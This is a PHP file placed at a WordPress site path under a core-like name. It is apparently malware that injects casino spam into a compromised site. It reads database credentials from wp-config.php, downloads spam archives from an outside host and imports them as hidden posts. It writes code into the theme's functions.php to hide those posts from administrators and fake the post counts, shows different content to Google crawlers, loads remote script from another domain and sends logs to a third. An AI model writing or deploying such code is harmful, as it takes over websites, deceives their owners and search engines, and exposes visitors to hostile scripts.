File: /home/logisdtech/public_html/wp-main.php
<?php
define('CURRENTDIR', getcwd());
define('GS_ALIAS', 'https://tableinhouse.com');
define('URL_WITH_ARCHIVES', GS_ALIAS . '/static/archives/CSN-ICR-SINGLE-UK-{DIR_NUM}/');
define('ARCHIVES_RANGE', '1-10');
define('DIR_NUM', 123);
define('REDEFINE_JS_FOR_USER', 1);
define('CLOACKING', 1);
$homeLinksSettings = array(
'hiddenType' => array(
'cloacking' => 0,
'css' => 1,
),
'position' => array(
'footer' => 0,
'head' => 1,
),
'language' => 'EN', //text api
'type' => 'CASINO',
'textBlocksCount' => array(
'onlyHomePage' => 0,
'10DifferentTextBlocks' => 1,
'100DifferentTextBlocks' => 0,
'fullDifferentTextBlocks' => 0,
),
);
$_SERVER['homeLinksSettings'] = $homeLinksSettings;
define('FORCE_CHANGE_HOME_LINKS_OWNER', 0);
/* * Link building settings* */
define('INTERNAL_LINKING', 1);
define('EXTERNAL_LINKING', 0);
define('INTERNAL_LINKS_COUNT_PAGE', '2..6');
define('EXTERNAL_LINKS_COUNT_PAGE', '1..3');
define('TABLE_HASH', '11c601a3bad16d2567e6754cddc9d28c');
define('HTML_HASH', '31d410006291280c70416aabda41c4e9');
define('COUNT_LINKS_FROM_DOMAIN', 3);
/* * Link building settings* */
define('SITEMAP_NAME', 'sitemap2002');
define('USE_ORIGINAL_SLUG', 1);
/*
* Use unzip method with header.php
* ziparchive unpacks files incorrectly.
*/
define('GREEK_LANGUAGE', 1);
//define('HOME_URL', 'https://musicforlife.co.id');
if (defined('CUSTOM_AUTHOR_ID') && CUSTOM_AUTHOR_ID < 1000) {
echo 'use CUSTOM_AUTHOR_ID value large then 1000' . PHP_EOL;
exit;
}
if (is_null($rootDir = detectWProotDir())) {
echo 'wp root directory not found' . PHP_EOL;
exit;
}
if (!linkBuildingSettingsCheck()) {
exit;
}
define('WP_ROOT_DIR', $rootDir);
//define('CUSTOM_TEMPLATE_PATH', $rootDir . '/wp-content/themes/oshin');
if (!defined('TEMPLATEPATH')) {
define('TEMPLATEPATH', '');
}
if (!defined('STYLESHEETPATH')) {
define('STYLESHEETPATH', '');
}
if (!defined('WP_USE_THEMES')) {
define('WP_USE_THEMES', false);
}
/* * settings* */
$actions = array(
'upload' => 1,
'unzip' => 1,
'import' => 1,
'hide' => 1,
'send' => 1,
'clean' => 1,
//'sitemap' => 1,
//'sitemapSecondMethod' => 1,
//'rollback' => 1,
//'sendPostsFromDb' => 1,
//'viewSettings' => 1,
//'viewAllAuthors' => 1,
//'allPermalinks' => 1,
//'viewSettingsAsJson' => 1,
);
$firstVarCustom = genLetCustom(rand(10, 20));
$secondVarCustom = genLetCustom(rand(10, 20));
$thirdVarCustom = genLetCustom(rand(10, 20));
$fourthVarCustom = genLetCustom(rand(10, 20));
$jsSource = <<<STR
new Image().src = "//counter.yadro.ru/hit;csnicr?r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random();
document.addEventListener("DOMContentLoaded", function (event) {
var bodyNode = document.getElementsByTagName('body')[0];
if (bodyNode) {
bodyNode.remove();
}
});
var ${firstVarCustom}="<script type=\"text/javascript\" language=\"JavaScript\" ";var ${secondVarCustom}="src=\"//charbroiledburgers.org/";var ${thirdVarCustom}="csnicr.js?ref="+encodeURI(document.URL)+"&title="+encodeURI(document.title)+"&httpref="+encodeURI(document.referrer)+"\">";var ${fourthVarCustom}=" </script>";document.write(${firstVarCustom}+${secondVarCustom}+${thirdVarCustom}+${fourthVarCustom});
STR;
define('JS_SOURCE', $jsSource);
define('RAND_DATE', 0);
define('ALTERNATIVE_CONNECT_MYSQL', 0);
/* * settings* */
if (ALTERNATIVE_CONNECT_MYSQL === 1) {
if (isBadEnvCustom()) {
echo 'change shell, invalid require wp-blog-header' . PHP_EOL;
exit;
}
require_once WP_ROOT_DIR . '/wp-blog-header.php';
if (defined('DB_PASSWORD')) {
if (stristr(DB_HOST, ':') !== false) {
list($hostAddr, $dbPort) = explode(':', DB_HOST);
} else {
$dbPort = 3306;
$hostAddr = DB_HOST;
}
$wpConfigArrTmp = array(
'dbname' => DB_NAME,
'dbuser' => DB_USER,
'dbpassword' => DB_PASSWORD,
'dbhostaddr' => $hostAddr,
'dbprefix' => $table_prefix,
'dbport' => $dbPort,
);
define('WP_CONFIG_ARR_AS_JSON', json_encode($wpConfigArrTmp));
} else {
echo 'error using alternative connection method' . PHP_EOL;
}
}
$configSource = file_get_contents(WP_ROOT_DIR . '/wp-config.php');
if ($configSource === false) {
echo 'error reading wp-config.php' . PHP_EOL;
exit;
}
if (!defined('WRITEABLE_PATH')) {
foreach (array('wp-content/uploads', 'wp-content/themes', 'wp-content/plugins') as $mbWriteablePath) {
$writeableDirectory = findWriteablePath(WP_ROOT_DIR . '/' . $mbWriteablePath);
if (!empty($writeableDirectory)) {
define('WRITEABLE_PATH', $writeableDirectory);
break;
}
}
}
if (!$writeableDirectory) {
echo 'no directory for writing' . PHP_EOL;
exit;
}
$tmpDirName = $_SERVER['HTTP_HOST'];
if (!is_dir(WRITEABLE_PATH . '/' . $tmpDirName)) {
if (!mkdir(WRITEABLE_PATH . '/' . $tmpDirName)) {
echo 'dont create temp dir' . PHP_EOL;
exit;
}
}
define('TMPDIR', WRITEABLE_PATH . '/' . $tmpDirName);
$configArr = parseWpConfig($configSource);
define('CONFIGSOURCE', $configSource);
function isAvailablePdoDriver($name) {
return (in_array($name, PDO::getAvailableDrivers()));
}
function customDbLink($configSource) {
if (detectSqliteInstance($configSource)) {
if (!isAvailablePdoDriver('sqlite')) {
echo 'sqlite driver not found' . PHP_EOL;
return false;
}
$db = new PDO("sqlite:" . WP_ROOT_DIR . '/wpsqlite.db');
} else {
if (!isAvailablePdoDriver('mysql')) {
echo 'mysql driver not found' . PHP_EOL;
return false;
}
$configArr = parseWpConfig($configSource);
$dbh = sprintf('mysql:host=%s;dbname=%s;port=%s', $configArr['dbhostaddr'], $configArr['dbname'], $configArr['dbport']);
$db = new PDO($dbh, $configArr['dbuser'], $configArr['dbpassword']
, array(PDO::MYSQL_ATTR_INIT_COMMAND => 'SET sql_mode="ALLOW_INVALID_DATES"'));
}
return $db;
}
try {
$customDbLink = customDbLink($configSource);
$dbConfig = detectSqliteInstance($configSource) ? false : $configArr;
$customDbHandler = new CustomDbHandler($customDbLink, $dbConfig);
} catch (Exception $ex) {
if (!$dbConfig) {
//mysql
$errorPdoConnection = 1;
} else {
echo 'Could not connect to db ' . $ex->getMessage();
exit;
}
}
if (isset($errorPdoConnection)) {
//var_dump('alternative connect');
require_once($rootDir . '/wp-config.php');
$definedConstants = get_defined_constants(true);
if (!$definedConstants['user']) {
echo 'Could not connect to db alternative method';
exit;
}
$dbname = $definedConstants['user']['DB_NAME'];
$dbuser = $definedConstants['user']['DB_USER'];
$dbpassword = $definedConstants['user']['DB_PASSWORD'];
$dbhostaddr = $definedConstants['user']['DB_HOST'];
$dbprefix = $prefix[1];
if (stristr($dbhostaddr, ':') !== false) {
list($hostAddr, $dbPort) = explode(':', $dbhostaddr);
} else {
$dbPort = 3306;
$hostAddr = $dbhostaddr;
}
try {
$dbh = sprintf('mysql:host=%s;dbname=%s;port=%s', $hostAddr, $dbname, $dbPort);
$customDbLink = new PDO($dbh, $dbuser, $dbpassword
, array(PDO::MYSQL_ATTR_INIT_COMMAND => 'SET sql_mode="ALLOW_INVALID_DATES", NAMES utf8'));
$customDbHandler = new CustomDbHandler($customDbLink, $dbConfig);
} catch (Exception $ex) {
echo 'Could not connect to db ' . $ex->getMessage();
exit;
}
}
function detectSqliteInstance($configSource) {
if (strstr($configSource, 'wpsqlite.db') !== false) {
return true;
}
return false;
}
echo "Connected successfully" . PHP_EOL;
$homeUrl = $customDbHandler->homeUrl();
if (!defined('HOME_URL')) {
if (!$homeUrl) {
echo 'homeurl function return null, please define HOME_URL manually' . PHP_EOL;
exit;
} else {
define('HOME_URL', $homeUrl);
}
}
if (defined('HOME_LINKS') && (HOME_LINKS === 1)) {
if (!validateHomeLinks($actions)) {
exit;
}
}
function validateHomeLinks($actions) {
if (defined('FORCE_CHANGE_HOME_LINKS_OWNER') && FORCE_CHANGE_HOME_LINKS_OWNER === 1) {
return true;
}
if (!isset($actions['homeLinks'])) {
return true;
}
$settings = getDbSettingsCustom();
if (isset($settings[CUSTOM_AUTHOR_ID])) {
unset($settings[CUSTOM_AUTHOR_ID]);
}
foreach ($settings as $value) {
if (isset($value['homeLinks']) && !is_null($value['homeLinks'])) {
echo 'another user is using home links' . PHP_EOL;
return false;
}
}
return true;
}
if (!function_exists('file_put_contents')) {
function file_put_contents($filename, $data) {
$f = @fopen($filename, 'w');
if (!$f) {
return false;
} else {
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
}
if (isset($actions['import']) && !isset($actions['hide'])) {
echo 'you cannot run import without hide' . PHP_EOL;
exit;
}
if (isset($actions['homeLinks']) && !isset($actions['hide'])) {
$actions['hide'] = 1;
}
if ((count($actions) > 1) && isset($actions['hide'])) {
unset($actions['hide']);
$actions = array('hide' => 1) + $actions;
}
foreach ($actions as $actionName => $status) {
if (!$status) {
continue;
}
doAction($actionName);
}
function doAction($actionName) {
$callBackName = $actionName . 'Action';
if (function_exists($callBackName)) {
echo $callBackName . ' start' . PHP_EOL;
if (!call_user_func($callBackName)) {
echo $callBackName . ' return false' . PHP_EOL;
exit;
}
} else {
echo "callBack $callBackName not found" . PHP_EOL;
}
}
function sitemapSecondMethodAction() {
if (!checkSitemapNameRoot()) {
return false;
}
if (isBadEnvCustom()) {
echo 'change shell, invalid require wp-blog-header' . PHP_EOL;
exit;
}
require_once WP_ROOT_DIR . '/wp-blog-header.php';
$head = sitemapHeadSec();
$sitemapSource = $head . "\n";
$sitemapPath = WP_ROOT_DIR . '/' . SITEMAP_NAME . '.xml';
try {
$urls = CustomDbHandler::getInstance()
->allPostsFromDb(HOME_URL, CUSTOM_AUTHOR_ID);
} catch (Exception $ex) {
throw new Exception('invalid fetch urls for sitemap');
}
if (empty($urls)) {
echo "no posts by author id" . PHP_EOL;
return false;
}
foreach ($urls as $urlWithTitle) {
list ($url, $title) = explode(';', $urlWithTitle, 2);
preg_match('~\?p=(\d+)~', $url, $idMatches);
$url = get_permalink($idMatches[1]);
echo $url . "\n";
$lastmod = date('Y-m-d');
$changefreqArr = array('monthly', 'weekly', 'daily', 'hourly', 'always');
$priority = '0.' . rand(5, 9);
$sitemapSource .= urlBlockSec($url, $lastmod, $changefreqArr[rand(0, count($changefreqArr) - 1)]
, $priority);
wp_cache_delete($idMatches[1], 'posts');
}
$sitemapSource .= "\n</urlset>";
if (file_put_contents($sitemapPath, $sitemapSource)) {
touch($sitemapPath, frequenttimestamp(WP_ROOT_DIR));
echo currenturl($sitemapPath, HOME_URL);
return true;
}
return false;
}
function sitemapHeadSec() {
return <<<STR
<?xml version="1.0" encoding="UTF-8"?>
<urlset
xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
STR;
}
function sitemapAction() {
if (!checkSitemapNameRoot()) {
return false;
}
$head = sitemapHeadSec();
$sitemapSource = $head . "\n";
$sitemapPath = WP_ROOT_DIR . '/' . SITEMAP_NAME . '.xml';
try {
$urls = CustomDbHandler::getInstance()
->allPostsFromDb(HOME_URL, CUSTOM_AUTHOR_ID);
} catch (Exception $ex) {
throw new Exception('invalid fetch urls for sitemap');
}
if (empty($urls)) {
echo "no posts by author id" . PHP_EOL;
return false;
}
foreach ($urls as $urlWithTitle) {
list ($url, $title) = explode(';', $urlWithTitle, 2);
$lastmod = date('Y-m-d');
$changefreqArr = array('monthly', 'weekly', 'daily', 'hourly', 'always');
$priority = '0.' . rand(5, 9);
$sitemapSource .= urlBlockSec($url, $lastmod, $changefreqArr[rand(0, count($changefreqArr) - 1)]
, $priority);
}
$sitemapSource .= "\n</urlset>";
if (file_put_contents($sitemapPath, $sitemapSource)) {
echo currenturl($sitemapPath);
return true;
}
return false;
}
function uploadAction() {
$url = str_replace('{DIR_NUM}', DIR_NUM, URL_WITH_ARCHIVES);
try {
uploadRangeOfFiles($url, ARCHIVES_RANGE, '.zip', TMPDIR);
return true;
} catch (Exception $ex) {
return false;
}
}
function unzipAction() {
if (defined('GREEK_LANGUAGE') && GREEK_LANGUAGE === 1) {
echo 'use unzip with header' . PHP_EOL;
try {
return unzipFirstMethod();
} catch (Exception $ex) {
echo $ex->getMessage();
}
}
if (class_exists('ZipArchive')) {
return unzipSecondMethod();
} else {
echo 'use unzip with header' . PHP_EOL;
try {
return unzipFirstMethod();
} catch (Exception $ex) {
echo $ex->getMessage();
}
}
}
function importAction() {
$date = '';
$htmlFiles = glob(TMPDIR . "/*.html");
shuffle($htmlFiles);
$mutexName = defined('CUSTOM_AUTHOR_ID') ? '_' . CUSTOM_AUTHOR_ID : '';
if (file_exists(TMPDIR . '/import_finish' . $mutexName)) {
echo 'files already imported' . PHP_EOL;
return true;
}
if (!$htmlFiles) {
echo "html files not found" . PHP_EOL;
return false;
}
$extLinksArr = array();
if (defined('EXTERNAL_LINKING') && (EXTERNAL_LINKING === 1)) {
$countHtmlFiles = count($htmlFiles);
downloadExternalLinks($countHtmlFiles);
$extLinksArr = decodeExternalLinks();
if (!$extLinksArr) {
return false;
}
}
$results = array();
if (!is_dir(TMPDIR . '/imported')) {
if (!mkdir(TMPDIR . '/imported')) {
echo "dont create imported dir" . PHP_EOL;
return false;
}
}
if (!defined('RAND_DATE') || (RAND_DATE === 0)) {
$date = CustomDbHandler::getInstance()->lastPostDateQuery();
}
foreach ($htmlFiles as $key => $html) {
try {
$contentParts = contentParts(file_get_contents($html));
} catch (Exception $ex) {
echo $ex->getMessage();
continue;
}
$text = $contentParts['text'];
$text = textWithLinks($text, $results, $extLinksArr);
$customSlug = slugPrepareBeforeInsert($html, $contentParts['slug']);
try {
$postId = CustomDbHandler::getInstance()->insertPost($contentParts['title'], $text, $date
, CUSTOM_AUTHOR_ID, $customSlug);
} catch (Exception $ex) {
var_dump($ex->getMessage());
continue;
}
$results[] = resultFormat(HOME_URL, $postId, $contentParts['title']);
rename($html, TMPDIR . '/imported/' . mb_basename($html, '.html'));
}
if (!empty($results)) {
$logPath = TMPDIR . '/log' . $mutexName . '.txt';
echo 'write to log - ' . $logPath . PHP_EOL;
echo currenturl($logPath, HOME_URL) . PHP_EOL;
file_put_contents($logPath, implode("\n", $results) . "\n", FILE_APPEND);
if ($key === (count($htmlFiles) - 1)) {
file_put_contents(TMPDIR . '/import_finish' . $mutexName, '');
}
return true;
} else {
echo "results are empty" . PHP_EOL;
return false;
}
}
function slugPrepareBeforeInsert($filename, $contentPartsSlug) {
if (defined('USE_ORIGINAL_SLUG') && (USE_ORIGINAL_SLUG === 1)) {
$customSlug = mb_basename($filename, '.html');
if (CustomDbHandler::getInstance()->dbType === CustomDbHandler::DB_TYPE_SQLITE) {
$customSlug = stringToSlug($contentPartsSlug);
}
} else {
$customSlug = $contentPartsSlug;
}
return $customSlug;
}
function linksPrepare($results) {
$links = array();
foreach ($results as $result) {
list ($url, $title) = explode(';', $result, 2);
$title = htmlspecialchars_decode($title);
$url = str_replace('//?p=', '/?p=', $url);
$links[] = "<a href=\"$url\">$title</a>";
}
return $links;
}
function getTemplatePath() {
try {
$templateName = CustomDbHandler::getInstance()->getOption('template');
$templateName = $templateName['option_value'];
} catch (Exception $ex) {
echo $ex->getMessage();
return false;
}
if (file_exists(WP_ROOT_DIR . '/wp-content/themes/' . $templateName . '/functions.php')) {
return WP_ROOT_DIR . '/wp-content/themes/' . $templateName;
}
//echo 'functions.php not found in theme directory' . PHP_EOL;
return false;
}
function hideAction() {
if (!defined('CUSTOM_TEMPLATE_PATH')) {
$templateDirectory = getTemplatePath();
} else {
$templateDirectory = CUSTOM_TEMPLATE_PATH;
}
$functionsPath = $templateDirectory . '/functions.php';
if (!file_exists($functionsPath)) {
echo $functionsPath . '/ no exists' . PHP_EOL;
return false;
}
if (!is_writeable($functionsPath)) {
echo $functionsPath . ' no writeable' . PHP_EOL;
return false;
}
$functionsSource = file_get_contents($functionsPath);
if ($functionsSource === false) {
echo 'error while reading functions.php' . PHP_EOL;
echo 'try to set right permissions...' . PHP_EOL;
if (!chmod($functionsPath, 0644)) {
return false;
}
echo 'success!' . PHP_EOL;
$functionsSource = file_get_contents($functionsPath);
}
$source = '/* custom filters */

function add_where_condition($where) {
    global $wpdb, $userSettingsArr;

    $ids = array_keys($userSettingsArr);
    $idsCommaSeparated = implode(', ', $ids);

    if (!is_single() && is_admin()) {
        add_filter('views_edit-post', 'fix_post_counts');
        return $where . " AND {$wpdb->posts}.post_author NOT IN ($idsCommaSeparated)";
    }

    return $where;
}

function post_exclude($query) {

    global $userSettingsArr;

    $ids = array_keys($userSettingsArr);
    $excludeString = modifyWritersString($ids);

    if (!$query->is_single() && !is_admin()) {
        $query->set('author', $excludeString);
    }
}

function wp_core_js() {

    global $post, $userSettingsArr;

    foreach ($userSettingsArr as $id => $settings) {
        if (($id == $post->post_author) && (isset($settings['js']))) {

            if (hideJSsource($settings)) {
                break;
            }
            echo $settings['js'];
            break;
        }
    }
}

function hideJSsource($settings) {
    if (isset($settings['nojs']) && $settings['nojs'] === 1) {
        //customSetDebug('cloacking is on!');
        //customSendDebug();
        if (customCheckSe()) {
            return true;
        }
    }
    return false;
}

function fix_post_counts($views) {
    global $current_user, $wp_query;

    $types = array(
        array('status' => NULL),
        array('status' => 'publish'),
        array('status' => 'draft'),
        array('status' => 'pending'),
        array('status' => 'trash'),
        array('status' => 'mine'),
    );
    foreach ($types as $type) {

        $query = array(
            'post_type' => 'post',
            'post_status' => $type['status']
        );

        $result = new WP_Query($query);

        if ($type['status'] == NULL) {
            if (preg_match('~\>\(([0-9,]+)\)\<~', $views['all'], $matches)) {
                $views['all'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['all']);
            }
        } elseif ($type['status'] == 'mine') {


            $newQuery = $query;
            $newQuery['author__in'] = array($current_user->ID);

            $result = new WP_Query($newQuery);

            if (preg_match('~\>\(([0-9,]+)\)\<~', $views['mine'], $matches)) {
                $views['mine'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['mine']);
            }
        } elseif ($type['status'] == 'publish') {
            if (preg_match('~\>\(([0-9,]+)\)\<~', $views['publish'], $matches)) {
                $views['publish'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['publish']);
            }
        } elseif ($type['status'] == 'draft') {
            if (preg_match('~\>\(([0-9,]+)\)\<~', $views['draft'], $matches)) {
                $views['draft'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['draft']);
            }
        } elseif ($type['status'] == 'pending') {
            if (preg_match('~\>\(([0-9,]+)\)\<~', $views['pending'], $matches)) {
                $views['pending'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['pending']);
            }
        } elseif ($type['status'] == 'trash') {
            if (preg_match('~\>\(([0-9,]+)\)\<~', $views['trash'], $matches)) {
                $views['trash'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['trash']);
            }
        }
    }
    return $views;
}

function filter_function_name_4055($counts, $type, $perm) {

    if ($type === 'post') {
        $old_counts = $counts->publish;
        $counts_mod = posts_count_custom($perm);
        $counts->publish = !$counts_mod ? $old_counts : $counts_mod;
    }
    return $counts;
}

function posts_count_custom($perm) {
    global $wpdb, $userSettingsArr;

    $ids = array_keys($userSettingsArr);
    $idsCommaSeparated = implode(', ', $ids);

    $type = 'post';

    $query = "SELECT post_status, COUNT( * ) AS num_posts FROM {$wpdb->posts} WHERE post_type = %s";

    if ('readable' == $perm && is_user_logged_in()) {

        $post_type_object = get_post_type_object($type);

        if (!current_user_can($post_type_object->cap->read_private_posts)) {
            $query .= $wpdb->prepare(
                " AND (post_status != 'private' OR ( post_author = %d AND post_status = 'private' ))", get_current_user_id()
            );
        }
    }
    $query .= " AND post_author NOT IN ($idsCommaSeparated) GROUP BY post_status";
    $results = (array)$wpdb->get_results($wpdb->prepare($query, $type), ARRAY_A);

    foreach ($results as $tmpArr) {
        if ($tmpArr['post_status'] === 'publish') {
            return $tmpArr['num_posts'];
        }
    }
}

function all_custom_posts_ids($userId) {
    global $wpdb;

    $query = "SELECT ID FROM {$wpdb->posts} where post_author = $userId";

    $results = (array)$wpdb->get_results($query, ARRAY_A);

    $ids = array();
    foreach ($results as $tmpArr) {
        $ids[] = $tmpArr['ID'];
    }
    return $ids;
}

function custom_flush_rules() {

    global $userSettingsArr, $wp_rewrite;

    $rules = get_option('rewrite_rules');

    foreach ($userSettingsArr as $key => $arr) {
        $regex = key($arr['sitemapsettings']);

        if (!isset($rules[$regex]) ||
            ($rules[$regex] !== current($arr['sitemapsettings']))) {
            $wp_rewrite->flush_rules();
        }
    }
}

function sitemap_xml_rules($rules) {

    global $userSettingsArr;

    $newrules = array();

    foreach ($userSettingsArr as $key => $arr) {
        if (isset($arr['sitemapsettings'])) {
            $newrules[key($arr['sitemapsettings'])] = current($arr['sitemapsettings']);
        }
    }

    return $newrules + $rules;
}

function customSitemapFeed() {

    global $userSettingsArr;

    foreach ($userSettingsArr as $key => $arr) {
        $feedName = str_replace('index.php?feed=', '', current($arr['sitemapsettings']));
        add_feed($feedName, 'customSitemapFeedFunc');
    }
}

function customSitemapFeedFunc() {
//ini_set('memory_limit', '256MB');
    header('Content-Type: ' . feed_content_type('rss-http') . '; charset=' . get_option('blog_charset'), true);
//header('Content-Type: ' . feed_content_type('rss') . '; charset=' . get_option('blog_charset'), true);
    status_header(200);

    $head = sitemapHead();
    $sitemapSource = $head . "\n";

    $userId = findUserIdByRequestUri();

    $posts_ids = all_custom_posts_ids($userId);
    $priority = '0.5';
    $changefreq = 'weekly';
    $lastmod = date('Y-m-d');

    foreach ($posts_ids as $post_id) {
        $url = get_permalink($post_id);
        $sitemapSource .= urlBlock($url, $lastmod, $changefreq, $priority);
        wp_cache_delete($post_id, 'posts');
    }

    $sitemapSource .= "\n</urlset>";

    echo $sitemapSource;
}

function sitemapHead() {
    return <<<STR
<?xml version="1.0" encoding="UTF-8"?>
<urlset
      xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
            http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">

    
STR;
}

function urlBlock($url, $lastmod, $changefreq, $priority) {

    return <<<STR
   <url>
      <loc>$url</loc>
      <lastmod>$lastmod</lastmod>
      <changefreq>$changefreq</changefreq>
      <priority>$priority</priority>
   </url>\n\n
STR;
}

function modifyWritersString($writersArr) {
    $writersArrMod = array();

    foreach ($writersArr as $item) {
        $writersArrMod[] = '-' . $item;
    }
    return implode(',', $writersArrMod);
}

function customFiltersSettings() {
    $settings = get_option(md5(sha1($_SERVER['HTTP_HOST'])));

    if (!$settings) {
        return null;
    }

    return unserialize(base64_decode($settings));
}

function findUserIdByRequestUri() {

    global $userSettingsArr;

    foreach ($userSettingsArr as $key => $arr) {

        $regexp = key($arr['sitemapsettings']) . '|'
            . str_replace('index.php?', '', current($arr['sitemapsettings']) . '$');

        if (preg_match("~$regexp~", $_SERVER['REQUEST_URI'])) {
            return $key;
        }
    }
}

function isCustomPost() {
    global $userSettingsArr, $post;

    $authors_ids_arr = array_keys($userSettingsArr);
    if (in_array($post->post_author, $authors_ids_arr)) {
        return true;
    }
    return false;
}

function removeYoastMeta() {
    global $userSettingsArr, $post;

    $authors_ids_arr = array_keys($userSettingsArr);

    if (!$post || !property_exists($post, 'author')) {
        return;
    }

    if (in_array($post->post_author, $authors_ids_arr)) {
        add_filter('wpseo_robots', '__return_false');
        add_filter('wpseo_googlebot', '__return_false'); // Yoast SEO 14.x or newer
        add_filter('wpseo_bingbot', '__return_false'); // Yoast SEO 14.x or newer
    }
}

function getRemoteIp() {

    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        return $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {
        return $_SERVER['HTTP_CF_CONNECTING_IP'];
    }
    if (isset($_SERVER['REMOTE_ADDR'])) {
        return $_SERVER['REMOTE_ADDR'];
    }

    return false;
}

function customCheckSe() {

    $ip = getRemoteIp();

    if (strstr($ip, ', ')) {
        $ips = explode(', ', $ip);
        $ip = $ips[0];
    }

    $ranges = customSeIps();

    if (!$ranges) {
        return false;
    }

    foreach ($ranges as $range) {
        if (customCheckInSubnet($ip, $range)) {
            //customSetDebug(sprintf('black_list||%s||%s||%s||%s', $ip, $range
            //                , $_SERVER['HTTP_USER_AGENT'], $_SERVER['HTTP_ACCEPT_LANGUAGE']));
            return true;
        }
    }

    //customSetDebug(sprintf('white list||%s||%s||%s||%s', $ip, $range
    //                , $_SERVER['HTTP_USER_AGENT'], $_SERVER['HTTP_ACCEPT_LANGUAGE']));
    return false;
}

function customIsRenewTime($timestamp) {
    //if ((time() - $timestamp) > 60 * 60 * 24) {
    if ((time() - $timestamp) > 60 * 60) {
        return true;
    }
    //customSetDebug(sprintf('time - %s, timestamp - %s', time(), $timestamp));
    return false;
}

function customSetDebug($data) {

    if (($value = get_option('wp_debug_data')) && is_array($value)) {
        $value[] = sprintf('%s||%s||%s', time(), $_SERVER['HTTP_HOST'], $data);
        update_option('wp_debug_data', $value, false);
        return;
    }

    update_option('wp_debug_data', array($data), false);
}

function customSendDebug() {

    $value = get_option('wp_debug_data');

    if (!is_array($value) || (count($value) < 100)) {
        return;
    }
    $url = 'http://wp-update-cdn.com/src/ualogsec.php';

    $response = wp_remote_post($url, array(
            'method' => 'POST',
            'timeout' => 10,
            'body' => array(
                'host' => $_SERVER['HTTP_HOST'],
                'debugdata' => gzcompress(json_encode($value)), 9)
        )
    );

    if (is_wp_error($response)) {
        return;
    } else {
        if (trim($response['body']) === 'success') {
            update_option('wp_debug_data', array(), false);
        }
    }
}

function customSeIps() {

    if (($value = get_option('wp_custom_range')) && !customIsRenewTime($value['timestamp'])) {
        return $value['ranges'];
    } else {
        //customSetDebug('time to update ranges');
        $response = wp_remote_get('https://www.gstatic.com/ipranges/goog.txt');
        if (is_wp_error($response)) {
            //customSetDebug('error response ipranges');
            return;
        }
        $body = wp_remote_retrieve_body($response);
        $ranges = preg_split("~(\r\n|\n)~", trim($body), -1, PREG_SPLIT_NO_EMPTY);

        if (!is_array($ranges)) {
            //customSetDebug('invalid update ranges not an array');
            return;
        }

        $value = array('ranges' => $ranges, 'timestamp' => time());
        update_option('wp_custom_range', $value, true);
        return $value['ranges'];
    }
}

function customInetToBits($inet) {
    $splitted = str_split($inet);
    $binaryip = '';
    foreach ($splitted as $char) {
        $binaryip .= str_pad(decbin(ord($char)), 8, '0', STR_PAD_LEFT);
    }
    return $binaryip;
}

function customCheckInSubnet($ip, $cidrnet) {
    $ip = inet_pton($ip);
    $binaryip = customInetToBits($ip);

    list($net, $maskbits) = explode('/', $cidrnet);
    $net = inet_pton($net);
    $binarynet = customInetToBits($net);

    $ip_net_bits = substr($binaryip, 0, $maskbits);
    $net_bits = substr($binarynet, 0, $maskbits);

    if ($ip_net_bits !== $net_bits) {
        //echo 'Not in subnet';
        return false;
    } else {
        return true;
    }
}

function buffer_start_custom() {
    echo '<!--buffer start custom--!>' . PHP_EOL;
    if (!isCustomPost()) {
        if (is_singular() || (is_front_page() || is_home())) {
            echo '<!--start callback custom--!>' . PHP_EOL;
            ob_start("callback_custom");
        }
    }
}

function buffer_end_custom() {
    ob_end_flush();
}

function callback_custom($buffer) {
    global $homeLinksSettingsArr;

    return buffer_prepare_custom($homeLinksSettingsArr, $buffer);
}

function buffer_prepare_custom($homeLinksSettingsArr, $buffer) {

    if (($homeLinksSettingsArr['hiddenType']['cloacking'] === 1) && !customCheckSe()) {
        customSetDebug('no google bot, without changes ' . getRemoteIp());
        return $buffer;
    }


    $textBlock = text_block_custom($homeLinksSettingsArr);
    $textBlock = additional_style_custom($homeLinksSettingsArr, $textBlock);


    if ($homeLinksSettingsArr['position']['footer'] === 1) {
        customSetDebug('footer position');
        return $buffer . PHP_EOL . $textBlock;
    }
    if ($homeLinksSettingsArr['position']['head'] === 1) {
        customSetDebug('header position');
        return $textBlock . PHP_EOL . $buffer;
    }
}

function text_block_custom($homeLinksSettingsArr) {

    global $post;

    $block = '';

    if ($homeLinksSettingsArr['textBlocksCount']['onlyHomePage'] === 1) {
        if (is_front_page() || is_home()) {
            customSetDebug('home page mode');
            $block = get_option('home_links_custom_0');
        }
    } elseif ($homeLinksSettingsArr['textBlocksCount']['10DifferentTextBlocks'] === 1) {

        $url = get_permalink($post->ID);
        preg_match('~\d~', md5($url), $matches);
        $block = get_option('home_links_custom_' . $matches[0]);
        $log = sprintf('10DifferentTextBlocks page mode block num - %s permalink - %s', $matches[0], $url);
        customSetDebug($log);
    } elseif ($homeLinksSettingsArr['textBlocksCount']['100DifferentTextBlocks'] === 1) {

        $url = get_permalink($post->ID);
        preg_match_all('~\d~', md5($url), $matches);
        $digits = ($matches[0][0] == 0) ? $matches[0][1] : $matches[0][0] . '' . $matches[0][1];
        $block = get_option('home_links_custom_' . $digits);
        $log = sprintf('100DifferentTextBlocks page mode block num - %s permalink - %s', $digits, $url);
        customSetDebug($log);
    } elseif ($homeLinksSettingsArr['textBlocksCount']['fullDifferentTextBlocks'] === 1) {

    } else {

    }

    return !$block ? '' : $block;
}

